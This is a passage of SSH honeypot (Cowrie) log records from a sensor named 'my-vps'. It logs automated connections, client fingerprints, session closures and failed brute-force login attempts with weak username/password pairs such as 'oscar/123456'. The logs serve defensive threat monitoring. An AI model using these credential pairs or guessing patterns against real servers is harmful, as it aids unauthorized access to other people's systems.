{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:10.407041Z","src_ip":"14.103.129.89","session":"2b50fa8106b6"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":55940,"dst_ip":"1.2.3.4","dst_port":22,"session":"f116149bea05","protocol":"ssh","message":"New connection: 14.103.129.89:55940 (1.2.3.4:22) [session: f116149bea05]","sensor":"my-vps","timestamp":"2025-08-26T10:21:10.481174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:10.481840Z","src_ip":"14.103.129.89","session":"f116149bea05"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":47468,"dst_ip":"1.2.3.4","dst_port":22,"session":"d08c3c4001f4","protocol":"ssh","message":"New connection: 14.103.129.89:47468 (1.2.3.4:22) [session: d08c3c4001f4]","sensor":"my-vps","timestamp":"2025-08-26T10:21:11.533573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:11.534390Z","src_ip":"14.103.129.89","session":"d08c3c4001f4"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":39506,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d0fa9918e05","protocol":"ssh","message":"New connection: 14.103.129.89:39506 (1.2.3.4:22) [session: 3d0fa9918e05]","sensor":"my-vps","timestamp":"2025-08-26T10:21:11.560474Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":47660,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a9fc932d2f2","protocol":"ssh","message":"New connection: 14.103.129.89:47660 (1.2.3.4:22) [session: 3a9fc932d2f2]","sensor":"my-vps","timestamp":"2025-08-26T10:21:11.563581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:11.565062Z","src_ip":"14.103.129.89","session":"3a9fc932d2f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:11.666086Z","src_ip":"14.103.129.89","session":"f116149bea05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:11.751598Z","src_ip":"14.103.129.89","session":"3a9fc932d2f2"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":50442,"dst_ip":"1.2.3.4","dst_port":22,"session":"1125c726fc4d","protocol":"ssh","message":"New connection: 14.103.129.89:50442 (1.2.3.4:22) [session: 1125c726fc4d]","sensor":"my-vps","timestamp":"2025-08-26T10:21:13.019856Z"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T10:21:13.747305Z","src_ip":"14.103.129.89","session":"f116149bea05"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:21:14.956479Z","src_ip":"14.103.129.89","session":"f116149bea05"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":40608,"dst_ip":"1.2.3.4","dst_port":22,"session":"32461bb6a7b4","protocol":"ssh","message":"New connection: 14.103.129.89:40608 (1.2.3.4:22) [session: 32461bb6a7b4]","sensor":"my-vps","timestamp":"2025-08-26T10:21:15.015678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:15.017288Z","src_ip":"14.103.129.89","session":"32461bb6a7b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:15.214133Z","src_ip":"14.103.129.89","session":"32461bb6a7b4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":57098,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d7e5a099afd","protocol":"ssh","message":"New connection: 196.251.86.249:57098 (1.2.3.4:22) [session: 1d7e5a099afd]","sensor":"my-vps","timestamp":"2025-08-26T10:21:15.410333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:15.954726Z","src_ip":"196.251.86.249","session":"1d7e5a099afd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:21:15.955533Z","src_ip":"196.251.86.249","session":"1d7e5a099afd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62754,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3e4c02015e5","protocol":"ssh","message":"New connection: 217.72.205.35:62754 (1.2.3.4:22) [session: c3e4c02015e5]","sensor":"my-vps","timestamp":"2025-08-26T10:21:18.039912Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:21:18.041028Z","src_ip":"217.72.205.35","session":"c3e4c02015e5"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1234qwer","message":"login attempt [oracle/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T10:21:18.591406Z","src_ip":"196.251.86.249","session":"1d7e5a099afd"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":41224,"dst_ip":"1.2.3.4","dst_port":22,"session":"94ff32f2bf54","protocol":"ssh","message":"New connection: 14.103.129.89:41224 (1.2.3.4:22) [session: 94ff32f2bf54]","sensor":"my-vps","timestamp":"2025-08-26T10:21:20.161896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:20.162843Z","src_ip":"14.103.129.89","session":"94ff32f2bf54"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:21:20.251830Z","src_ip":"196.251.86.249","session":"1d7e5a099afd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:20.339312Z","src_ip":"14.103.129.89","session":"94ff32f2bf54"}
{"eventid":"cowrie.session.closed","duration":"31.1","message":"Connection lost after 31.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:21:21.747685Z","src_ip":"14.103.129.89","session":"44e04ef432b3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:22.924709Z","src_ip":"14.103.129.89","session":"1125c726fc4d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:22.925920Z","src_ip":"14.103.129.89","session":"1125c726fc4d"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":43380,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1b4eeb5b44b","protocol":"ssh","message":"New connection: 14.103.129.89:43380 (1.2.3.4:22) [session: d1b4eeb5b44b]","sensor":"my-vps","timestamp":"2025-08-26T10:21:24.019385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:24.020351Z","src_ip":"14.103.129.89","session":"d1b4eeb5b44b"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":50404,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff55a2a3bc1d","protocol":"ssh","message":"New connection: 14.103.129.89:50404 (1.2.3.4:22) [session: ff55a2a3bc1d]","sensor":"my-vps","timestamp":"2025-08-26T10:21:24.039055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:24.039830Z","src_ip":"14.103.129.89","session":"ff55a2a3bc1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:24.226131Z","src_ip":"14.103.129.89","session":"ff55a2a3bc1d"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":34534,"dst_ip":"1.2.3.4","dst_port":22,"session":"5849d6805e03","protocol":"ssh","message":"New connection: 14.103.129.89:34534 (1.2.3.4:22) [session: 5849d6805e03]","sensor":"my-vps","timestamp":"2025-08-26T10:21:26.638451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:26.639503Z","src_ip":"14.103.129.89","session":"5849d6805e03"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:26.817021Z","src_ip":"14.103.129.89","session":"5849d6805e03"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":34259,"dst_ip":"1.2.3.4","dst_port":22,"session":"84c0671b7544","protocol":"ssh","message":"New connection: 14.103.129.89:34259 (1.2.3.4:22) [session: 84c0671b7544]","sensor":"my-vps","timestamp":"2025-08-26T10:21:31.149072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:31.149962Z","src_ip":"14.103.129.89","session":"84c0671b7544"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":56432,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c61a9631571","protocol":"ssh","message":"New connection: 14.103.129.89:56432 (1.2.3.4:22) [session: 0c61a9631571]","sensor":"my-vps","timestamp":"2025-08-26T10:21:31.583078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:31.584397Z","src_ip":"14.103.129.89","session":"0c61a9631571"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:32.701834Z","src_ip":"14.103.129.89","session":"0c61a9631571"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@